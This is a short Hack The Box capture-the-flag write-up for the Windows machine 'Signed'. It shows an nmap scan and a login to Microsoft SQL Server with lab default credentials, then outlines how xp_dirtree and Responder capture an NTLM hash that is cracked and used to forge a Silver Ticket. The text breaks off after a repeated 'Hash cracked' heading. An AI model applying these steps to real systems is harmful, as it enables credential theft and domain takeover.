Signed

Platform: Hack The Box

Season: 9

Difficulty: Medium

OS: Windows

Date: 2025-11-11

Author: x4cc3

Executive Summary

Signed is a Medium Windows domain controller machine running Microsoft SQL Server 2022. Initial access uses default credentials scott:Sm230#C5NatH to connect via mssqlclient.py. An NTLM hash is captured via responder and cracked to reveal mssqlsvc's credentials. Once authenticated as mssqlsvc, a Silver Ticket attack is executed using the cracked NTLM hash and domain SID to forge a Kerberos ticket granting sysadmin privileges, enabling direct file reads of both user and root flags.

Reconnaissance

Port Scan

nmap -Pn -sV -sC 10.10.11.90
Port Service Version
1433/tcp MS-SQL Microsoft SQL Server 2022 RTM

Initial access to the SQL server used default credentials:

mssqlclient.py scott:Sm230#C5NatH@10.10.11.90

Hash Capture via Responder

Using xp_dirtree to trigger an SMB connection back to the attacker's machine, an NTLMv2 hash was captured via Responder.

Hash cracked

Hash cracked